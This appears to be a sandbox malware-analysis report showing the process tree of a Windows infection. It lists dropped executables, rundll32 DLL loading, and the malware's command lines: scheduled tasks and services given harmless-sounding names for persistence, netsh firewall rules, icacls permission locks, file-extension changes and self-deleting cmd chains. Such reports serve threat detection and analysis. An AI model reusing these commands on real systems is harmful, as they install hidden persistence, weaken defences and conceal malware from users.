- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe (depth 7)
  Command line: "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15e2f113a40ce5.exe (depth 1)
  Command line: Wed15e2f113a40ce5.exe
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15e2f113a40ce5.exe (depth 2)
  Command line: C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15e2f113a40ce5.exe
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15e2f113a40ce5.exe (depth 2)
  Command line: C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15e2f113a40ce5.exe
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15ac1df9305ded09.exe (depth 1)
  Command line: Wed15ac1df9305ded09.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\cmd.exe (depth 2)
  Command line: cmd.exe /c taskkill /f /im chrome.exe
- C:\Windows\SysWOW64\taskkill.exe (depth 3)
  Command line: taskkill /f /im chrome.exe
  - Kills process with taskkill
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed1529d8198a8f0c1.exe (depth 1)
  Command line: Wed1529d8198a8f0c1.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Roaming\1631231.scr (depth 2)
  Command line: "C:\Users\Admin\AppData\Roaming\1631231.scr" /S
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Roaming\7712201.scr (depth 2)
  Command line: "C:\Users\Admin\AppData\Roaming\7712201.scr" /S
  - Executes dropped EXE
  - Adds Run key to start application
- C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe (depth 3)
  Command line: "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
  - Executes dropped EXE
- C:\Users\Admin\AppData\Roaming\6517854.scr (depth 2)
  Command line: "C:\Users\Admin\AppData\Roaming\6517854.scr" /S
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- C:\Users\Admin\AppData\Roaming\6020523.scr (depth 2)
  Command line: "C:\Users\Admin\AppData\Roaming\6020523.scr" /S
  - Executes dropped EXE
- C:\Windows\system32\rundll32.exe (depth 1)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
- C:\Windows\SysWOW64\rundll32.exe (depth 2)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL
- C:\Windows\system32\rundll32.exe (depth 1)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
- C:\Windows\SysWOW64\rundll32.exe (depth 2)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL
- C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
- C:\Windows\system32\browser_broker.exe (depth 1)
  Command line: C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings
- C:\Windows\system32\msiexec.exe (depth 1)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Drops file in Windows directory
- C:\Windows\syswow64\MsiExec.exe (depth 2)
  Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 505B6BA862F63A8AB5B73FBD51224993 C
  - Loads dropped DLL
- C:\Windows\syswow64\MsiExec.exe (depth 2)
  Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 310AD5F23E87302959D44F6907B61F14
  - Blocklisted process makes network request
  - Loads dropped DLL
- C:\Windows\SysWOW64\taskkill.exe (depth 3)
  Command line: "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
  - Kills process with taskkill
- C:\Windows\syswow64\MsiExec.exe (depth 2)
  Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 216B61B1F8F77F6832F1503BA7C052CF E Global\MSI0000
  - Loads dropped DLL
- C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
- C:\Windows\SysWOW64\rundll32.exe (depth 1)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL
- C:\Windows\system32\rundll32.exe (depth 1)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
- C:\Users\Admin\AppData\Local\Temp\DCCF.exe (depth 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\DCCF.exe
  - Suspicious use of SetThreadContext
- C:\Users\Admin\AppData\Local\Temp\DCCF.exe (depth 2)
  Command line: C:\Users\Admin\AppData\Local\Temp\DCCF.exe
  - Adds Run key to start application
- C:\Windows\SysWOW64\icacls.exe (depth 3)
  Command line: icacls "C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  - Modifies file permissions
- C:\Users\Admin\AppData\Local\Temp\DCCF.exe (depth 3)
  Command line: "C:\Users\Admin\AppData\Local\Temp\DCCF.exe" --Admin IsNotAutoStart IsNotTask
  - Suspicious use of SetThreadContext
- C:\Users\Admin\AppData\Local\Temp\DCCF.exe (depth 4)
  Command line: "C:\Users\Admin\AppData\Local\Temp\DCCF.exe" --Admin IsNotAutoStart IsNotTask
  - Modifies extensions of user files
- C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build2.exe (depth 5)
  Command line: "C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build2.exe"
  - Suspicious use of SetThreadContext
- C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build2.exe (depth 6)
  Command line: "C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build2.exe"
  - Loads dropped DLL
  - Checks processor information in registry
- C:\Windows\SysWOW64\cmd.exe (depth 7)
  Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build2.exe" & del C:\ProgramData\*.dll & exit
- C:\Windows\SysWOW64\taskkill.exe (depth 8)
  Command line: taskkill /im build2.exe /f
  - Kills process with taskkill
- C:\Windows\SysWOW64\timeout.exe (depth 8)
  Command line: timeout /t 6
  - Delays execution with timeout.exe
- C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build3.exe (depth 5)
  Command line: "C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build3.exe"
  - Suspicious use of SetThreadContext
- C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build3.exe (depth 6)
  Command line: "C:\Users\Admin\AppData\Local\112da1a8-02e2-4fac-ac21-3773b6f9331d\build3.exe"
  - Executes dropped EXE
- C:\Windows\SysWOW64\schtasks.exe (depth 7)
  Command line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
- Executes dropped EXE
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\FC10.exeC:\Users\Admin\AppData\Local\Temp\FC10.exe1⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\52FB.exeC:\Users\Admin\AppData\Local\Temp\52FB.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\52FB.exeC:\Users\Admin\AppData\Local\Temp\52FB.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7BB2.exeC:\Users\Admin\AppData\Local\Temp\7BB2.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7BB2.exeC:\Users\Admin\AppData\Local\Temp\7BB2.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7BB2.exeC:\Users\Admin\AppData\Local\Temp\7BB2.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\BADF.exeC:\Users\Admin\AppData\Local\Temp\BADF.exe1⤵
-
C:\Users\Admin\AppData\Roaming\BADF.exe"C:\Users\Admin\AppData\Roaming\BADF.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Self.bat" "3⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12514⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\BADF.exe3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 04⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Self.bat" "2⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del BADF.exe2⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 03⤵
-
C:\Users\Admin\AppData\Local\Temp\E079.exeC:\Users\Admin\AppData\Local\Temp\E079.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\lblmweuz\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wmhtnzdv.exe" C:\Windows\SysWOW64\lblmweuz\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create lblmweuz binPath= "C:\Windows\SysWOW64\lblmweuz\wmhtnzdv.exe /d\"C:\Users\Admin\AppData\Local\Temp\E079.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description lblmweuz "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start lblmweuz2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Users\Admin\yojvpbfx.exe"C:\Users\Admin\yojvpbfx.exe" /d"C:\Users\Admin\AppData\Local\Temp\E079.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rykxgtuo.exe" C:\Windows\SysWOW64\lblmweuz\3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config lblmweuz binPath= "C:\Windows\SysWOW64\lblmweuz\rykxgtuo.exe /d\"C:\Users\Admin\yojvpbfx.exe\""3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start lblmweuz3⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8607.bat" "3⤵
-
C:\Users\Admin\AppData\Local\Temp\E60.exeC:\Users\Admin\AppData\Local\Temp\E60.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Local\Temp\2A94.exeC:\Users\Admin\AppData\Local\Temp\2A94.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 2642⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\68A8.exeC:\Users\Admin\AppData\Local\Temp\68A8.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\InternodesPiets_2021-09-29_21-00.exe"C:\Users\Admin\AppData\Local\Temp\InternodesPiets_2021-09-29_21-00.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Money10k_.exe"C:\Users\Admin\AppData\Local\Temp\Money10k_.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess1⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\406F.exeC:\Users\Admin\AppData\Local\Temp\406F.exe1⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 406F.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\406F.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 406F.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\5957.exeC:\Users\Admin\AppData\Local\Temp\5957.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\2483.exeC:\Users\Admin\AppData\Local\Temp\2483.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\CF58.exeC:\Users\Admin\AppData\Local\Temp\CF58.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\CF58.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
